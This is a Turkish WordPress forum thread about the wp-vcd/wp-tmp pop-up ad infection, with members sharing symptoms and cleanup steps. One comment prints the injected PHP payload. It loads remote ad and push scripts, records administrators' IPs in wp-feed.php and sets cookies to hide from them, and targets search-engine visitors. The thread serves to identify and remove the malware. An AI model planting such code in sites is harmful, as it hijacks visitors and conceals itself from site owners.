Wordpress Pop-up Reklam Virüsü ( wp-tmp & wp-vcd.php )

Hocam bir sitede herhangi bir linke tıklayınca farklı bir url açıyordu reklam olarak bundan kaynaklı olabilir mi?
Bilgilendirmeniz için teşekkür ederim

Yüksek ihtimalle.

HelixTm Hocam elinize sağlık, dediklerinizi harfiyen yerine getirdim ve websitem hızlandı.. artık reklamlarda çıkmıyor, çok teşekkür ederim.. artık sorunun ne olduğunu biliyorum... sağolun!

ini_set('display_errors', 0);
error_reporting(0);
$wp_auth_key='87bb33fbf403a29ecd19ef0c33383f05';




if ( ! function_exists( 'slider_option' ) ) {

function slider_option($content){
if(is_single())
{




$con = '
';

$con2 = '

<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1694484"></script>
<script src="//basepush.com/ntfc.php?p=1694488" data-cfasync="false" async></script>
';

$content=$content.$con2;
}
return $content;
}

function slider_option_footer(){
if(!is_single())
{




$con2 = '

<script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=1694484"></script>
<script src="//basepush.com/ntfc.php?p=1694488" data-cfasync="false" async></script>
';

echo $con2;
}
}








function setting_my_first_cookie() {
setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
}


if(is_user_logged_in())
{
add_action( 'init', 'setting_my_first_cookie',1 );
}







if( current_user_can('edit_others_pages'))
{

if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}

if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);


}



}






$ref = $_SERVER['HTTP_REFERER'];
$SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.' ,'doubleclick.net','googleweblight.com');
foreach ($SE as $source) {
if (strpos($ref,$source)!==false) {
setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN);
$sevisitor=true;
}
}






if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in())
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
if($sevisitor==true || isset($_COOKIE['sevisitor']))
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}

}

}





}

Hocam bu kodları nerde buldun? Neyin içindeler?

Hocam sitenizin tüm şifrelerini değiştirin, hatta sql'un bile. Bu adamların ne yapacağı belli olmaz?

Arkadaşlar ben sorunumu bu eklenti sayesinde çözdüm. Js dosyalarına bulaştırmışlar bende. Bu eklenti taramayı yapıyor ve sorunun nerde olduğunu bulup, sorunlu dosyayı eski haline getiriyor.

Ajansturka teşekkürler.

Arkadaşlar ne yazık ki bu problem benimde başıma geldi. En azından nereden geldiğini buldum. eklenti ile geliyor. Google Rich Snippets için bir eklenti indirip kurdum (eklentinin adını unuttum). Kısa bir süre sonra terslik olduğunu farkettim. Malware taraması yaptım. Cache dosyalarıma ve temanın functions.php dosyasına enjekte edildiğini gördüm.

Öncelikle tüm cache dosyalarını sildim. Ardından konuyu açan arkadaşın belirttiği gibi functions.php içindeki kötü amaçlı kodları kaldırdım. zaten kodlar kendini belli ediyor. wp-tmp.php, wp-vcd.php gördüğüm tüm kod satırlarını sildim. Tabi wp-includes klasörünün içindende wp-tmp.php, wp-vcd.php dosyalarını sildim.

şuan sorunsuz bir biçimde sitemi kullanmaya devam ediyorum.

Bilmediğiniz eklentileri eklemenin zararları işte bu daima dikkatli olmakta ve sürekli yedek almakta fayda var. bunca emeğin uçmasına üzülmenin tarifi olmaz.

Kendisi şuana kadar gördüğüm en yardımsever webmaster. Böyle insanların olması gerçekten mutluluk verici